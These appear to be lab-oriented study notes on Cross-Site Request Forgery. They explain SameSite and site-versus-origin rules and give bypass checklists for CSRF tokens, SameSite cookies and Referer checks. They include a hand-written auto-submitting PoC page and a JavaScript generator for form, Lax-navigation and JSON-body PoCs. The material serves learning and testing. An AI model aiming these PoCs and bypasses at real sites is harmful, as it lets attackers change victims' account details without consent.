
Cross Site Request Forgery


CSRF stands for Cross-Site Request Forgery: an attacker tricks a victim into visiting a malicious page or link, and the victim's browser then sends a request the victim never intended (changing their password or email, purchasing a product, etc.), authenticated with the victim's existing session cookie.

CSRF is easy to exploit. Burp Suite Pro can generate a CSRF PoC for you; otherwise build one by hand as shown below.

<html>
    <body>
        <!-- hidden form targeting the state-changing endpoint with the attacker's values -->
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            <!-- submit automatically as soon as the victim loads the page -->
            document.forms[0].submit();
        </script>
    </body>
</html>

Save this as an HTML file, host it, and get the logged-in victim to open it; the form submits itself and the browser attaches the victim's session cookie.

There are three types of defence against CSRF:

  • CSRF token

  • SameSite cookie

  • Referer-based validation

Note: each of these has known bypasses when it is implemented weakly.

CSRF token bypass checklist:

  • [ ] Token validation depends on the request method (e.g. checked on POST but not on GET, so switch the method)

  • [ ] Token is only validated when the parameter is present (remove the parameter entirely, not just its value)

  • [ ] Token is not tied to the user's session (try account A's token in account B's request)

  • [ ] Token is tied to a non-session cookie (if you can get that cookie set in the victim's browser, you can use the matching token)

  • [ ] Token is simply duplicated in a cookie and a parameter (double-submit) and never stored server-side, so setting both to any value of your choice passes the check

Site = scheme + eTLD+1 (the registrable domain, e.g. domain.com under the public suffix .com). The port is not part of the site.

Origin = scheme + host + port.

Example:

https://sub.domain.com:443

Here the site is https + domain.com, i.e. https://domain.com (so https://other.domain.com is the same site, but http://domain.com is not, because the scheme differs)

and the origin is the full scheme, host and port: https://sub.domain.com:443

How does a SameSite cookie work?

Ans: the SameSite attribute limits when the browser attaches a cookie to a cross-site request. Before SameSite existed, the browser sent the cookie with every request to the cookie's domain without checking whether the request originated from the same site or from somewhere else, which is what makes classic CSRF work.

There are three levels of SameSite:

  1. Strict: SameSite=Strict

  2. Lax: SameSite=Lax (Chrome applies this by default when the attribute is missing)

  3. None: SameSite=None (must be combined with the Secure attribute)

In Strict the cookie is never sent on a cross-site request: if the site of the request does not match the site shown in the address bar, the request still goes out but without the cookie, so the server sees an unauthenticated request.

In Lax the cookie is sent on a cross-site request only if both conditions hold:

  • the request uses the GET method

  • the request results from a top-level navigation by the user (clicking a link, or a script setting document.location), not from an iframe, image, form POST or XHR/fetch

In None there is no SameSite restriction (the pre-SameSite behaviour).
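To make the site/origin distinction and the three levels concrete, here is an added example (not code from the original notes) that models the decision a browser makes. The public-suffix list is a constructed toy; real browsers use the full Public Suffix List. The Lax-by-default branch also models Chrome's "Lax + POST" exception (a cookie with no SameSite attribute set less than 2 minutes ago is still sent on a top-level cross-site POST), which is the behaviour the cookie-refresh bypass later on this page relies on.

```javascript
// Added example: site vs origin computation and the SameSite cookie decision.
// Toy public-suffix list (constructed for the example; browsers use the PSL).
const PUBLIC_SUFFIXES = new Set(['com', 'net', 'io', 'co.uk', 'github.io']);

// Origin = scheme + host + port (default port filled in when omitted).
function originOf(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === 'https:' ? '443' : '80');
  return `${u.protocol}//${u.hostname}:${port}`;
}

// Site = scheme + eTLD+1 (registrable domain). The port is NOT part of the site,
// but the scheme is (schemeful same-site).
function siteOf(url) {
  const u = new URL(url);
  const labels = u.hostname.split('.');
  for (let i = 0; i < labels.length; i++) {
    const suffix = labels.slice(i).join('.');
    if (PUBLIC_SUFFIXES.has(suffix)) {
      // one label above the public suffix is the registrable domain
      const etldPlus1 = labels.slice(Math.max(i - 1, 0)).join('.');
      return `${u.protocol}//${etldPlus1}`;
    }
  }
  return `${u.protocol}//${u.hostname}`; // unknown suffix: whole host is the site
}

function isSameSite(a, b) {
  return siteOf(a) === siteOf(b);
}

// Decide whether a cookie is attached to a request.
// cookie: { sameSite: 'Strict' | 'Lax' | 'None' | undefined, ageSeconds }
// req:    { url, initiator, method, topLevelNavigation }
function cookieSent(cookie, req) {
  if (isSameSite(req.url, req.initiator)) return true;   // same-site: always sent
  let mode = cookie.sameSite;
  if (mode === undefined) {
    // Chromium default when the attribute is missing: Lax, except that a cookie
    // set < 120 s ago is still sent on a top-level cross-site POST ("Lax + POST").
    if (req.method === 'POST' && req.topLevelNavigation && cookie.ageSeconds < 120) return true;
    mode = 'Lax';
  }
  if (mode === 'None') return true;                      // no restriction
  if (mode === 'Strict') return false;                   // never cross-site
  // Lax: only a GET that is a top-level navigation
  return req.method === 'GET' && req.topLevelNavigation;
}
```

Reading the decision function top to bottom gives the bypass map: Strict needs the request to become same-site (client-side redirect), Lax needs a GET top-level navigation (method override), and a missing attribute needs a freshly set cookie (cookie refresh).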

To solve the labs, use a script tag to force the user into a top-level navigation to the vulnerable URL via document.location; because that is a GET top-level navigation, a Lax cookie is still attached.

If the SameSite restriction is Strict, first look for a client-side redirect on the vulnerable site itself: only if the site redirects the user to the target URL (so the final request is same-site) can this scenario be exploited.

SameSite cookie bypass checklist:

  • [ ] Lax bypass via method override (found a _method parameter): send a GET top-level navigation with _method=POST so the server handles it as a POST while the browser still attaches the Lax cookie

  • [ ] Strict bypass via client-side redirect: a controllable redirect on the site makes the final request same-site, so even Strict cookies are attached

  • [ ] Lax bypass via cookie refresh (SSO): Chrome's default Lax does not apply to a cookie with no explicit SameSite attribute for 2 minutes after it is set, so trigger a re-login (e.g. through the SSO endpoint, which issues a fresh session cookie) and then fire the POST PoC

Bypassing Referer-based defence:

  • [ ] Check whether the server accepts a request with no Referer at all (suppress it from the PoC page with <meta name="referrer" content="no-referrer">)

  • [ ] Check whether the validation only looks for the expected domain somewhere in the Referer (a prefix or substring check), which a URL under your control that contains that name may satisfy

CSRF in JSON body

An HTML form cannot send application/json, but with enctype="text/plain" the browser sends the body literally as name=value. So the JSON is split across the input's name and its value: the name carries the JSON up to a throwaway key whose value absorbs the "=" the browser inserts, and the value carries the closing quote and brace. This only works when the server does not enforce the Content-Type of the request.
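As an added example (not code from the original notes), a small PoC generator covering the three page types used on this page: the auto-submitting POST form, the document.location navigation used for the Lax bypass with a method override, and the text/plain trick for a JSON body. The target URLs, field names and the _method override parameter are placeholders assumed for the example; whether the override and the text/plain body are accepted depends on the target server.

```javascript
// Added example: CSRF PoC generator (Node.js), the same job as Burp's "Generate CSRF PoC".

// Attribute-safe escaping so attacker-chosen values cannot break the PoC markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// 1. Auto-submitting form: the classic POST PoC for form-encoded endpoints.
function formPoc(action, fields, method = 'POST') {
  const inputs = Object.entries(fields)
    .map(([n, v]) => `<input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}" />`)
    .join('\n');
  return `<html><body>
<form action="${escapeHtml(action)}" method="${method}">
${inputs}
</form>
<script>document.forms[0].submit();</script>
</body></html>`;
}

// 2. Top-level GET navigation for SameSite=Lax. The browser attaches Lax
// cookies to this request; if the server honours a method-override parameter
// (assumed _method=POST here) the state change still happens.
function navigationPoc(url, params) {
  const target = new URL(url);
  for (const [k, v] of Object.entries(params)) target.searchParams.set(k, v);
  return `<script>document.location = ${JSON.stringify(target.toString())};</script>`;
}

// 3. JSON body via enctype="text/plain". The body is "<name>=<value>", so the
// JSON is split so that the single "=" lands inside a throwaway "ignore" key.
function jsonPocParts(obj) {
  const json = JSON.stringify(obj);          // {"email":"pwned@evil-user.net"}
  const head = json === '{}' ? '{' : json.slice(0, -1) + ',';
  return { name: head + '"ignore":"', value: '"}' };
}

function jsonPoc(action, obj) {
  const { name, value } = jsonPocParts(obj);
  return `<html><body>
<form action="${escapeHtml(action)}" method="POST" enctype="text/plain">
<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}" />
</form>
<script>document.forms[0].submit();</script>
</body></html>`;
}

// What the browser puts on the wire for one text/plain field: name=value plus CRLF.
function textPlainBody(name, value) {
  return `${name}=${value}\r\n`;
}
```

The Content-Type sent with the JSON PoC is text/plain, not application/json, so the technique only works against servers that parse the body as JSON without checking the header; a server that rejects the wrong Content-Type is the caveat, not a bug in the PoC.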
